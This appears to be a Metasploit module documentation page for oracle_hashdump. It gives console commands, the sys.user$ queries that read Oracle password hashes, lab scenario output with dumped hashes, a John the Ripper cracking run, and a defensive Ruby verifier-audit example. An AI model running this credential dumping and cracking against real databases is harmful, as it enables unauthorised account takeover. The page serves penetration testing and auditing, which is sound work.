Oracle Password Hashdump - Metasploit
This page contains detailed information about how to use the auxiliary/scanner/oracle/oracle_hashdump Metasploit module. For a list of all Metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Oracle Password Hashdump
Module: auxiliary/scanner/oracle/oracle_hashdump
Source code: modules/auxiliary/scanner/oracle/oracle_hashdump.rb
Disclosure date: -
Last modification time: 2019-03-28 10:06:56 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): 1521
List of CVEs: -
This module dumps the usernames and password hashes from Oracle given the proper Credentials and SID. These are then stored as creds for later cracking using auxiliary/analyze/jtr_oracle_fast. This module supports Oracle DB versions 8i, 9i, 10g, 11g, and 12c.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
This module is a scanner module, and is capable of testing against multiple hosts.
msf > use auxiliary/scanner/oracle/oracle_hashdump
msf auxiliary(oracle_hashdump) > show options
... show and set options ...
msf auxiliary(oracle_hashdump) > set RHOSTS ip-range
msf auxiliary(oracle_hashdump) > exploit
Other examples of setting the RHOSTS option:
Example 1:
msf auxiliary(oracle_hashdump) > set RHOSTS 192.168.1.3-192.168.1.200
Example 2:
msf auxiliary(oracle_hashdump) > set RHOSTS 192.168.1.1/24
Example 3:
msf auxiliary(oracle_hashdump) > set RHOSTS file:/tmp/ip_list.txt
Required Options
- RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
Knowledge Base
Preparation: 6 steps
- Oracle DB XE (Express Edition) can be downloaded for free here.
- Install Oracle Database and create a database. Versions 8i through 12c are supported.
On your Oracle DB machine, make sure you can ping the DB server using the tnsping [SID] command. If tnsping is not in your path upon installation, you will have to locate it manually.
- On a Windows machine, for Oracle 11g, tnsping.exe is located at: oracle_install\app\oracle\product\<version, i.e. 11.2.0>\server\bin\tnsping.exe.
- On a Windows machine, for Oracle 12c and 18c, it is located at %ORACLE_HOME%\bin\tnsping.exe.
After this command is run, if all is well, the output will look something like this (note the OK echoed at the end):
C:> tnsping staticdb
...
Used TNSNAMES adapter to resolve the alias
Attempting to contact (DESCRIPTION = (ADDRESS = (PROTOCOL = TCP)(HOST = localhost)(PORT = 1521)) (CONNECT_DATA = (SERVER = DEDICATED) (SERVICE_NAME = staticdb)))
OK (0 msec)
If tnsping fails, make sure the listener is set up correctly. See this Oracle doc for more information about its configuration.
Make sure to create a user on the DB that has a known password, and sufficient privileges to select any table. This is necessary for getting the hashes.
Test that the module's hash query works locally. Once your user is created with sufficient privileges, connect to the DB as the user, and run the following query:
- 12c:
SELECT name, spare4 FROM sys.user$ where password is not null and name <> 'ANONYMOUS'
- pre-12c:
SELECT name, password FROM sys.user$ where password is not null and name <> 'ANONYMOUS'
Set up your MSF environment to support Oracle. You need the ruby-oci8 gem, as well as Oracle Instant Client. View the setup tutorial here.
Make sure you have a database connected to MSF (postgresql). This can be done through the msfdb tool or through the db_connect command in msfconsole.
Verification Steps
- Start msfconsole
- Do: use auxiliary/scanner/oracle/oracle_hashdump.rb
- Do: run
- If the Oracle DB version is supported, the query will be attempted to get the hashes. The hash table is built and then saved as credentials.
- You may view saved credentials with the creds command. These are used for cracking by the module jtr_oracle_fast.
Options
DBPASS The password to authenticate with. Change this from TIGER to the password of the privileged user created in step 4 of Preparation.
DBUSER The username to authenticate with. Change this from SCOTT to the user you created who is granted privileges to select from the sys.user$ table.
RPORT The TNS port of the Oracle DB server. By default, Oracle uses port 1521. Double-check the port of your Oracle DB.
SID The Service ID (of the database) to authenticate with. Change this to your SID (if you changed the SID from default upon installation). Default is ORCL (default Oracle install value) or XE for free edition.
Scenarios
Running Oracle 12c on a local Windows 10 machine, and MSF5 on Ubuntu for Windows (same machine)
msf5 auxiliary(scanner/oracle/oracle_hashdump) > show options
Module options (auxiliary/scanner/oracle/oracle_hashdump):
Name Current Setting Required Description
---- --------------- -------- -----------
DBPASS hunter2 yes The password to authenticate with.
DBUSER scott yes The username to authenticate with.
RHOST 127.0.0.1 yes The Oracle host.
RHOSTS 127.0.0.1 yes The target address range or CIDR identifier
RPORT 1522 yes The TNS port.
SID staticdb yes The sid to authenticate with.
THREADS 1 yes The number of concurrent threads
msf5 auxiliary(scanner/oracle/oracle_hashdump) > run
[*] Server is running 12c
[*] Hash table :
Oracle Server Hashes
====================
Username Hash
-------- ----
...
SCOTT S:BF6D4E3791075A348BA76EF533E38F7211513CCE2A3513EE3E3D4A5A4DE0;H:3814C74599475EB73043A1211742EE59;T:0911BAC55EEF63F0C1769E816355BE29492C9D01980DC36C95A86C9CE47F93790631DE3D9A60C90451CFF152E25D9E94F612A1493EC82AF8E3C4D0432B06BA4C2C693B932332BC14D2D66CEF098A4699
...
[+] Hash Table has been saved
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/oracle/oracle_hashdump) > creds
Credentials
===========
host origin service public private realm private_type JtR Format
---- ------ ------- ------ ------- ----- ------------ ----------
127.0.0.1 127.0.0.1 1522/tcp (oracle) SCOTT S:BF6D4E3791075A348BA76EF533E38F7211513CCE2A3513EE3E3D4A5A4DE0;H:3814C74599475EB73043A1211742EE59;T:0911BAC55EEF63F0C1769E816355BE29492C9D01980DC36C95A86C9CE47F93790631DE3D9A60C90451CFF152E25D9E94F612A1493EC82AF8E3C4D0432B06BA4C2C693B932332BC14D2D66CEF098A4699 Nonreplayable hash oracle12c
These hashes are then saved as credentials so that jtr_oracle_fast can crack them (using John The Ripper "bleeding_jumbo").
msf5 auxiliary(scanner/oracle/oracle_hashdump) > use auxiliary/analyze/jtr_oracle_fast
msf5 auxiliary(analyze/jtr_oracle_fast) > run
...
[*] Cracking oracle12c hashes in normal wordlist mode...
Using default input encoding: UTF-8
[*] Cracking oracle12c hashes in single mode...
Using default input encoding: UTF-8
[*] Cracked passwords this run:
[+] SCOTT:hunter2
...
Oracle 18c (18.4 XE) on Windows 2012
resource (oracle.rb)> use auxiliary/scanner/oracle/oracle_hashdump
resource (oracle.rb)> set rhosts 1.1.1.1
rhosts => 1.1.1.1
resource (oracle.rb)> set dbuser system
dbuser => system
resource (oracle.rb)> set dbpass oracle
dbpass => oracle
resource (oracle.rb)> set sid XE
sid => XE
resource (oracle.rb)> run
[-] Version 18c is not currently supported
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Oracle 11g (11.2 XE) on Windows 2012
resource (oracle.rb)> use auxiliary/scanner/oracle/oracle_hashdump
resource (oracle.rb)> set rhosts 1.1.1.1
rhosts => 1.1.1.1
resource (oracle.rb)> set dbuser system
dbuser => system
resource (oracle.rb)> set dbpass oracle
dbpass => oracle
resource (oracle.rb)> set sid XE
sid => XE
msf5 auxiliary(scanner/oracle/oracle_hashdump) > set verbose true
verbose => true
msf5 auxiliary(scanner/oracle/oracle_hashdump) > run
[*] Server is running version 11g
[*] Hash table :
Oracle Server Hashes
====================
Username Hash
-------- ----
APEX_040000 S:03D9B47D20C9A9EC3023177D80C0EE2D1DCEDA619215C2405177CEFFEE76
APEX_PUBLIC_USER S:E8D8CCD600CBCEA08ACB158A502C5DA711B00146404621BB2F83E8997246
APPQOSSYS S:4237CCB702887B049107EE6D13C312123F40E3F51208B2B70D6DA92E621D
CTXSYS S:3548FDA49F84F2F7ECE4635BA0FD714EC2446723074ED6167F1CD9B6EDFB
DBSNMP S:59354E99120C523F77232A8CCFDE5E780591FCE14109EEE2C86F4A9B4E8F
DIP S:1E4C37D0E8DC2E556D3C02A961ACEF1500B315D076BE13E578D1A28FC757
FLOWS_FILES S:A3657555975A9F7527C4B97637734D74465C592B9D231CA3DAB100ED5865
HR S:F437C1647EBCEB1D1FB4BB3D866953B4BF612B343944B899E061B361F31B
MDSYS S:F337C5D6300E3F8CDEDE0F2B2336415EAAE098A700A35E6731BF1370657E
ORACLE_OCM S:1575D1C89A1AACFE161ED788D2DC59CF6C57AE3B6CCC341D831AAF5BC447
OUTLN S:142AD444D8A63983FF69C77DBFD3E60947C14237AEC71031E24F5228D44C
SYS S:BFAF1ED5A8D39CC10D07DAF03A175C65198359874DAD92F081BE09B89162
SYSTEM S:D88BA08B353EC52E1EFD8433DF623773ACE3F81B7294BBC2E5C22CDD32F5
XDB S:88D6BE2B593143BD5AE5185C564826F9213E71361230D3360E36C3FF55D2
XS$NULL S:6C4F97FF654AE30BCD9BDBB3007EF952B5943F0A9ED491455E9FB185D8A1
[+] Hash Table has been saved
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
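The scenario output above shows the two layouts the module collects from sys.user$: a lone S: value on 11g and an S:;H:;T: triple in spare4 on 12c. The following is an added example, not code from the module or from the original page: it classifies which verifiers each account still carries so that accounts holding only-fast-hash material can be identified. The function names and the sample rows are assumptions made for illustration, and the hex values are constructed, not real hashes.

```ruby
# Added example, not Metasploit code: classify the verifiers stored for each
# account in sys.user$ (columns `password` and `spare4`, as queried above).

# Tags that appear in spare4, the hex length each carries, and whether the
# algorithm is a single-pass (fast) hash rather than an iterated one.
SPARE4_VERIFIERS = {
  'S' => { name: '11g salted SHA-1',   hex_len: 60,  fast_hash: true  },
  'H' => { name: 'HTTP digest MD5',    hex_len: 32,  fast_hash: true  },
  'T' => { name: '12c PBKDF2 SHA-512', hex_len: 160, fast_hash: false }
}.freeze

# Split "S:<hex>;H:<hex>;T:<hex>" into { tag => hex }, rejecting anything
# that does not match the expected shape.
def parse_spare4(spare4)
  spare4.to_s.split(';').each_with_object({}) do |part, out|
    tag, hex = part.split(':', 2)
    spec = SPARE4_VERIFIERS[tag]
    raise ArgumentError, "unknown verifier tag #{tag.inspect}" unless spec
    unless hex.to_s.match?(/\A\h{#{spec[:hex_len]}}\z/)
      raise ArgumentError, "#{tag}: expected #{spec[:hex_len]} hex characters"
    end
    out[tag] = hex
  end
end

# Report which verifiers an account carries and which of them are fast hashes.
def audit_account(name, password_col, spare4)
  verifiers = []
  fast = []
  if password_col.to_s.match?(/\A\h{16}\z/) # pre-11g DES hash is 16 hex chars
    verifiers << '10g DES'
    fast << '10g DES'
  end
  parse_spare4(spare4).each_key do |tag|
    spec = SPARE4_VERIFIERS[tag]
    verifiers << spec[:name]
    fast << spec[:name] if spec[:fast_hash]
  end
  { name: name, verifiers: verifiers, fast_hash: fast }
end

# Constructed rows (not real hashes): [name, password, spare4]
SAMPLE_ROWS = [
  ['APP_OLD',    'A' * 16, "S:#{'B' * 60}"],
  ['APP_12C',    nil,      "S:#{'C' * 60};H:#{'D' * 32};T:#{'E' * 160}"],
  ['APP_ONLY_T', nil,      "T:#{'F' * 160}"]
].freeze

def audit_rows(rows)
  rows.map { |name, pw, s4| audit_account(name, pw, s4) }
end

if __FILE__ == $PROGRAM_NAME
  audit_rows(SAMPLE_ROWS).each do |r|
    flag = r[:fast_hash].empty? ? 'ok' : 'WEAK'
    puts format('%-11s %-5s %s', r[:name], flag, r[:verifiers].join(', '))
  end
end
```

Accounts flagged WEAK keep those verifiers until their password is changed after the server has been restricted to 12c verifiers (SQLNET.ALLOWED_LOGON_VERSION_SERVER in sqlnet.ora).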
Msfconsole Usage
Here is how the scanner/oracle/oracle_hashdump auxiliary module looks in the msfconsole:
msf6 > use auxiliary/scanner/oracle/oracle_hashdump
msf6 auxiliary(scanner/oracle/oracle_hashdump) > show info
Name: Oracle Password Hashdump
Module: auxiliary/scanner/oracle/oracle_hashdump
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
theLightCosine
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
DBPASS TIGER yes The password to authenticate with.
DBUSER SCOTT yes The username to authenticate with.
RHOST yes The Oracle host.
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 1521 yes The TNS port.
SID ORCL yes The sid to authenticate with.
THREADS 1 yes The number of concurrent threads (max one per host)
Description:
This module dumps the usernames and password hashes from Oracle
given the proper Credentials and SID. These are then stored as creds
for later cracking using auxiliary/analyze/jtr_oracle_fast. This
module supports Oracle DB versions 8i, 9i, 10g, 11g, and 12c.
Module Options
This is a complete list of options available in the scanner/oracle/oracle_hashdump auxiliary module:
msf6 auxiliary(scanner/oracle/oracle_hashdump) > show options
Module options (auxiliary/scanner/oracle/oracle_hashdump):
Name Current Setting Required Description
---- --------------- -------- -----------
DBPASS TIGER yes The password to authenticate with.
DBUSER SCOTT yes The username to authenticate with.
RHOST yes The Oracle host.
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 1521 yes The TNS port.
SID ORCL yes The sid to authenticate with.
THREADS 1 yes The number of concurrent threads (max one per host)
Advanced Options
Here is a complete list of advanced options supported by the scanner/oracle/oracle_hashdump auxiliary module:
msf6 auxiliary(scanner/oracle/oracle_hashdump) > show advanced
Module advanced options (auxiliary/scanner/oracle/oracle_hashdump):
Name Current Setting Required Description
---- --------------- -------- -----------
ShowProgress true yes Display progress messages during a scan
ShowProgressPercent 10 yes The interval in percent that progress should be shown
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the scanner/oracle/oracle_hashdump module can do:
msf6 auxiliary(scanner/oracle/oracle_hashdump) > show actions
Auxiliary actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the scanner/oracle/oracle_hashdump auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(scanner/oracle/oracle_hashdump) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Error Messages
This module may fail with the following error messages:
- An error has occurred while querying for the Oracle version. Please check your OPTIONS
- Version 18c is not currently supported
- Error: Oracle DB version not supported.\nThis module supports Oracle DB versions 8i, 9i, 10g, 11g, and 12c.\nDumping unsupported version info:\n<VER:0>
- An error occurred. The supplied credentials may not have proper privileges
Check for the possible causes in the code snippets below, taken from the module source code. This can often help in identifying the root cause of the problem.
An error has occurred while querying for the Oracle version. Please check your OPTIONS
Here is a relevant code snippet related to the "An error has occurred while querying for the Oracle version. Please check your OPTIONS" error message:
# 11g uses SHA-1 while 8i-10g use DES
query = 'select * from v$version'
ver = prepare_exec(query)

if ver.nil?
  print_error("An error has occurred while querying for the Oracle version. Please check your OPTIONS")
  return
end

unless ver.empty?
  case
Version 18c is not currently supported
Here is a relevant code snippet related to the "Version 18c is not currently supported" error message:
when ver[0].include?('11g')
  ver='11g'
when ver[0].include?('12c')
  ver='12c'
when ver[0].include?('18c')
  print_error("Version 18c is not currently supported")
  return
else
  print_error("Error: Oracle DB version not supported.\nThis module supports Oracle DB versions 8i, 9i, 10g, 11g, and 12c.\nDumping unsupported version info:\n#{ver[0]}")
  return
end
Error: Oracle DB version not supported.\nThis module supports Oracle DB versions 8i, 9i, 10g, 11g, and 12c.\nDumping unsupported version info:\n<VER:0>
Here is a relevant code snippet related to the "Error: Oracle DB version not supported.\nThis module supports Oracle DB versions 8i, 9i, 10g, 11g, and 12c.\nDumping unsupported version info:\n<VER:0>" error message:
    ver='12c'
  when ver[0].include?('18c')
    print_error("Version 18c is not currently supported")
    return
  else
    print_error("Error: Oracle DB version not supported.\nThis module supports Oracle DB versions 8i, 9i, 10g, 11g, and 12c.\nDumping unsupported version info:\n#{ver[0]}")
    return
  end
  vprint_status("Server is running version #{ver}")
end

An error occurred. The supplied credentials may not have proper privileges
Here is a relevant code snippet related to the "An error occurred. The supplied credentials may not have proper privileges" error message:
          tbl << row
        end
      end
    end
  rescue => e
    print_error("An error occurred. The supplied credentials may not have proper privileges")
    return
  end
  print_status("Hash table :\n #{tbl}")
  report_hashes(tbl, ver, ip, this_service)
end
Related Pull Requests
- #11623 Merged Pull Request: Add 12c support for oracle_hashdump
- #11351 Merged Pull Request: jtr modernizations (again again again)
- #8716 Merged Pull Request: Print_Status -> Print_Good (And OCD bits 'n bobs)
- #8697 Merged Pull Request: fixes oracle_hashdump and jtr_oracle_fast modules
- #8338 Merged Pull Request: Fix msf/core and self.class msftidy warnings
- #7200 Merged Pull Request: Rex::Ui::Text cleanup
- #6655 Merged Pull Request: use MetasploitModule as a class name
- #6648 Merged Pull Request: Change metasploit class names
- #5059 Merged Pull Request: Yard doc corrections
- #2525 Merged Pull Request: Change module boilerplate
- #1228 Merged Pull Request: MSFTIDY cleanup #1 - auxiliary
See Also
Check also the following modules related to this module:
- auxiliary/scanner/oracle/oracle_login
- auxiliary/scanner/http/oracle_demantra_database_credentials_leak
- auxiliary/scanner/http/oracle_demantra_file_retrieval
- auxiliary/scanner/http/oracle_ilom_login
- auxiliary/scanner/oracle/emc_sid
- auxiliary/scanner/oracle/isqlplus_login
- auxiliary/scanner/oracle/isqlplus_sidbrute
- auxiliary/scanner/oracle/sid_brute
- auxiliary/scanner/oracle/sid_enum
- auxiliary/scanner/oracle/spy_sid
- auxiliary/scanner/oracle/tnslsnr_version
- auxiliary/scanner/oracle/tnspoison_checker
- auxiliary/scanner/oracle/xdb_sid
- auxiliary/scanner/oracle/xdb_sid_brute
- auxiliary/admin/oracle/oracle_index_privesc
- auxiliary/admin/oracle/oracle_login
- auxiliary/admin/oracle/oracle_sql
- exploit/multi/http/oracle_ats_file_upload
- exploit/multi/http/oracle_reports_rce
- exploit/multi/http/oracle_weblogic_wsat_deserialization_rce
- exploit/unix/webapp/oracle_vm_agent_utl
- exploit/windows/browser/oracle_autovue_setmarkupmode
- exploit/windows/browser/oracle_dc_submittoexpress
- exploit/windows/browser/oracle_webcenter_checkoutandopen
- exploit/windows/http/oracle_beehive_evaluation
- exploit/windows/http/oracle_beehive_prepareaudiotoplay
- exploit/windows/http/oracle_btm_writetofile
- exploit/windows/http/oracle_endeca_exec
- exploit/windows/http/oracle_event_processing_upload
- auxiliary/scanner/ssl/bleichenbacher_oracle
- auxiliary/gather/ldap_hashdump
- auxiliary/scanner/mssql/mssql_hashdump
- auxiliary/scanner/mysql/mysql_authbypass_hashdump
- auxiliary/scanner/mysql/mysql_hashdump
- auxiliary/scanner/postgres/postgres_hashdump
- auxiliary/admin/oracle/oraenum
- auxiliary/admin/oracle/ora_ntlm_stealer
- auxiliary/admin/oracle/osb_execqr
- auxiliary/admin/oracle/osb_execqr2
- auxiliary/admin/oracle/osb_execqr3
- auxiliary/admin/oracle/post_exploitation/win32exec
- auxiliary/admin/oracle/post_exploitation/win32upload
- auxiliary/admin/oracle/sid_brute
- auxiliary/admin/oracle/tnscmd
- auxiliary/sqli/oracle/dbms_cdc_ipublish
- auxiliary/sqli/oracle/dbms_cdc_publish
- auxiliary/sqli/oracle/dbms_cdc_publish2
- auxiliary/sqli/oracle/dbms_cdc_publish3
- auxiliary/sqli/oracle/dbms_cdc_subscribe_activate_subscription
- auxiliary/sqli/oracle/dbms_export_extension
- auxiliary/sqli/oracle/dbms_metadata_get_granted_xml
- auxiliary/sqli/oracle/dbms_metadata_get_xml
- auxiliary/sqli/oracle/dbms_metadata_open
- auxiliary/sqli/oracle/droptable_trigger
- auxiliary/sqli/oracle/jvm_os_code_10g
- auxiliary/sqli/oracle/jvm_os_code_11g
- auxiliary/sqli/oracle/lt_compressworkspace
- auxiliary/sqli/oracle/lt_findricset_cursor
- auxiliary/sqli/oracle/lt_mergeworkspace
- auxiliary/sqli/oracle/lt_removeworkspace
- auxiliary/sqli/oracle/lt_rollbackworkspace
- exploit/windows/oracle/client_system_analyzer_upload
- exploit/windows/oracle/extjob
- exploit/windows/oracle/osb_ndmp_auth
- exploit/windows/oracle/tns_arguments
- exploit/windows/oracle/tns_auth_sesskey
- exploit/windows/oracle/tns_service_name
Authors
- theLightCosine
Version
This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.